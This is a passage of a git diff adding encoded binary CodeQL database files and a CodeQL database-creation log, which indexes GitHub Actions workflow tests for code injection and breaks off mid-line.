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 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/yaml_scalars.rel b/db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..aa10fbd1a3ab8b089f766b6e623ff699b1dc88ff GIT binary patch literal 12540 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 Initializing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:05:58] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-03-01 13:05:58] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/.codeqlmanifest.json +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby/codeql-extractor.yml. +[2024-03-01 13:05:58] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + }, + "python_executable_name" : { + "title" : "Controls the name of the Python executable used by the Python extractor.", + "description" : "The Python extractor uses platform-dependent heuristics to determine the name of the Python executable to use. Specifying a value for this option overrides the name of the Python executable used by the extractor. Accepted values are py, python and python3. Use this setting with caution, the Python extractor requires Python 3 to run.\n", + "type" : "string", + "pattern" : "^(py|python|python3)$" + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the extractor. The supported levels are (in order of increasing verbosity):\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-03-01 13:05:58] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 +[2024-03-01 13:05:58] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. +[2024-03-01 13:05:58] [DETAILS] database init> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-03-01 13:05:58] [PROGRESS] database init> Calculated baseline information for languages: (71ms). +[2024-03-01 13:05:58] [PROGRESS] database init> Resolving extractor yaml. +[2024-03-01 13:05:58] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. +[2024-03-01 13:05:58] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. +[2024-03-01 13:05:58] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. This in-progress database is ready to be populated by an extractor. +[2024-03-01 13:05:58] Plumbing command codeql database init completed. +[2024-03-01 13:05:58] [PROGRESS] database create> Running build command: [] +[2024-03-01 13:05:58] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --index-traceless-dbs --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh. +[2024-03-01 13:05:58] [PROGRESS] database trace-command> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh] +[2024-03-01 13:05:59] [build-stderr] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [build-stderr] /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [build-stderr] Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] +[2024-03-01 13:05:59] Plumbing command codeql database trace-command completed. +[2024-03-01 13:05:59] [PROGRESS] database create> Finalizing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:05:59] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:59] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db... +[2024-03-01 13:05:59] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/yaml.dbscheme -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml +[2024-03-01 13:05:59] Clearing disk cache since the version file /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache/version does not exist +[2024-03-01 13:05:59] Tuple pool not found. Clearing relations with cached strings +[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode clear. +[2024-03-01 13:05:59] Sequence stamp origin is -6212520902965462594 +[2024-03-01 13:05:59] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Trimming completed (6ms): Purged everything. +[2024-03-01 13:05:59] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml +[2024-03-01 13:05:59] Found 27 TRAP files (71.04 KiB) +[2024-03-01 13:05:59] [PROGRESS] dataset import> Importing TRAP files +[2024-03-01 13:05:59] Importing argus_case_study.yml.trap.gz (1 of 27) +[2024-03-01 13:05:59] Importing changed-files.yml.trap.gz (2 of 27) +[2024-03-01 13:05:59] Importing comment_issue.yml.trap.gz (3 of 27) +[2024-03-01 13:05:59] Importing comment_issue_newline.yml.trap.gz (4 of 27) +[2024-03-01 13:05:59] Importing cross1.yml.trap.gz (5 of 27) +[2024-03-01 13:05:59] Importing cross2.yml.trap.gz (6 of 27) +[2024-03-01 13:05:59] Importing cross3.yml.trap.gz (7 of 27) +[2024-03-01 13:05:59] Importing discussion.yml.trap.gz (8 of 27) +[2024-03-01 13:05:59] Importing discussion_comment.yml.trap.gz (9 of 27) +[2024-03-01 13:05:59] Importing gollum.yml.trap.gz (10 of 27) +[2024-03-01 13:05:59] Importing image_link_generator.yml.trap.gz (11 of 27) +[2024-03-01 13:05:59] Importing inter-job.yml.trap.gz (12 of 27) +[2024-03-01 13:05:59] Importing issues.yaml.trap.gz (13 of 27) +[2024-03-01 13:05:59] Importing matrix.yml.trap.gz (14 of 27) +[2024-03-01 13:05:59] Importing no-flow1.yml.trap.gz (15 of 27) +[2024-03-01 13:05:59] Importing no-flow2.yml.trap.gz (16 of 27) +[2024-03-01 13:05:59] Importing pull_request_review.yml.trap.gz (17 of 27) +[2024-03-01 13:05:59] Importing pull_request_review_comment.yml.trap.gz (18 of 27) +[2024-03-01 13:05:59] Importing pull_request_target.yml.trap.gz (19 of 27) +[2024-03-01 13:05:59] Importing push.yml.trap.gz (20 of 27) +[2024-03-01 13:05:59] Importing simple1.yml.trap.gz (21 of 27) +[2024-03-01 13:05:59] Importing simple2.yml.trap.gz (22 of 27) +[2024-03-01 13:05:59] Importing test.yml.trap.gz (23 of 27) +[2024-03-01 13:05:59] Importing workflow_run.yml.trap.gz (24 of 27) +[2024-03-01 13:05:59] Importing action.yml.trap.gz (25 of 27) +[2024-03-01 13:05:59] Importing action.yml.trap.gz (26 of 27) +[2024-03-01 13:05:59] Importing sourceLocationPrefix.trap.gz (27 of 27) +[2024-03-01 13:05:59] [PROGRESS] dataset import> Merging relations +[2024-03-01 13:05:59] Merging 1 fragment for 'files'. +[2024-03-01 13:05:59] Merged 208 bytes for 'files'. +[2024-03-01 13:05:59] Merging 1 fragment for 'folders'. +[2024-03-01 13:05:59] Merged 128 bytes for 'folders'. +[2024-03-01 13:05:59] Merging 1 fragment for 'containerparent'. +[2024-03-01 13:05:59] Merged 328 bytes for 'containerparent'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_scalars'. +[2024-03-01 13:05:59] Merged 12540 bytes (12.25 KiB) for 'yaml_scalars'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml'. +[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'yaml'. +[2024-03-01 13:05:59] Merging 1 fragment for 'locations_default'. +[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'locations_default'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_locations'. +[2024-03-01 13:05:59] Merged 11128 bytes (10.87 